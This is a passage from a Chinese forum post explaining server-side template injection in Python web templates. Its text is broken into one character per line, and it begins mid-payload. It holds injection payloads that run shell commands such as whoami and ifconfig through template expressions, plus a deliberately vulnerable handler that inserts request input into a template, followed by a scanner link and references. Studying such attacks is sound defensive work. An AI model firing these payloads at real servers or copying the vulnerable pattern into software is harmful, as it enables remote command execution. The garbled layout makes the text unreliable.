m
p
/
c
m
d
'
)
}
}
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
5
0
0
0
/
?
n
a
m
e
=
{
{
c
o
n
f
i
g
[
'
R
U
N
C
M
D
'
]
(
'
i
f
c
o
n
f
i
g
'
,
s
h
e
l
l
=
t
r
u
e
)
}
}
r
e
n
d
e
r
:
依
次
调
用
r
e
n
d
e
r
_
s
t
r
i
n
g
及
相
关
渲
染
函
数
生
成
的
内
容
,
最
后
调
用
f
i
n
i
s
h
直
接
输
出
给
客
户
端
。
r
e
n
d
e
r
_
s
t
r
i
n
g
:
通
过
模
板
文
件
名
加
载
模
板
,
然
后
更
新
模
板
引
擎
中
的
命
名
空
间
,
添
加
一
些
全
局
函
数
或
其
他
对
象
,
然
后
生
成
并
返
回
渲
染
好
的
h
t
m
l
内
容
n
a
m
e
=
r
e
q
u
e
s
t
.
G
E
T
[
'
n
a
m
e
'
]
t
e
m
p
l
a
t
e
_
d
a
t
a
=
o
p
e
n
(
"
t
e
s
t
.
h
t
m
l
"
)
.
r
e
a
d
(
)
t
e
m
p
l
a
t
e
=
T
e
m
p
l
a
t
e
.
l
o
a
d
(
t
e
m
p
l
a
t
e
_
d
a
t
a
)
r
e
s
p
o
n
s
e
.
w
r
i
t
e
(
t
e
m
p
l
a
t
e
,
n
a
m
e
=
'
W
o
r
l
d
!
'
)
h
t
m
l
>
<
h
e
a
d
>
<
t
i
t
l
e
>
H
e
l
l
o
{
{
n
a
m
e
}
}
<
/
t
i
t
l
e
>
<
/
h
e
a
d
>
<
b
o
d
y
>
H
e
l
l
o
F
O
O
<
/
b
o
d
y
>
<
/
h
t
m
l
>
n
a
m
e
=
r
e
q
u
e
s
t
.
G
E
T
[
'
n
a
m
e
'
]
t
e
m
p
l
a
t
e
_
d
a
t
a
=
o
p
e
n
(
"
a
b
c
.
h
t
m
l
"
)
.
r
e
a
d
(
)
t
e
m
p
l
a
t
e
_
d
a
t
a
=
t
e
m
p
l
a
t
e
_
d
a
t
a
.
r
e
p
l
a
c
e
(
"
F
O
O
"
,
n
a
m
e
)
t
e
m
p
l
a
t
e
=
T
e
m
p
l
a
t
e
.
l
o
a
d
(
t
e
m
p
l
a
t
e
_
d
a
t
a
)
r
e
s
p
o
n
s
e
.
w
r
i
t
e
(
t
e
m
p
l
a
t
e
,
n
a
m
e
=
'
w
o
r
l
d
'
)
{
{
…
}
}
之
间
的
的
输
入
会
发
送
给
模
板
引
擎
加
载
后
输
出
。
例
如
:
{
{
2
*
2
}
}
输
出
4
{
%
i
m
p
o
r
t
m
o
d
u
l
e
%
}
允
许
用
户
加
载
p
y
t
h
o
n
模
块
例
如
:
{
%
i
m
p
o
r
t
o
s
%
}
{
{
o
s
.
p
o
p
e
n
(
"
w
h
o
a
m
i
"
)
.
r
e
a
d
(
)
}
}
—
扫
描
工
具
扫
描
工
具
下
载
地
址
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
e
p
i
n
n
a
/
t
p
l
m
a
p
0
5
—
参
考
资
料
参
考
资
料
h
t
t
p
:
/
/
b
l
o
g
.
k
n
o
w
n
s
e
c
.
c
o
m
/
2
0
1
5
/
1
1
/
s
e
r
v
e
r
-
s
i
d
e
-
t
e
m
p
l
a
t
e
-
i
n
j
e
c
t
i
o
n
-
a
t
t
a
c
k
-
a
n
a
l
y
s
i
s
/
h
t
t
p
:
/
/
d
e
a
d
p
o
o
l
.
s
h
/
2
0
1
7
/
R
C
E
-
S
p
r
i
n
g
s
/
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
s
w
i
s
s
k
y
r
e
p
o
/
P
a
y
l
o
a
d
s
A
l
l
T
h
e
T
h
i
n
g
s
/
t
r
e
e
/
m
a
s
t
e
r
/
S
e
r
v
e
r
%
2
0
S
i
d
e
%
2
0
T
e
m
p
l
a
t
e
%
2
0
I
n
j
e
c
t
i
o
n
#
t
o
o
l
s
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞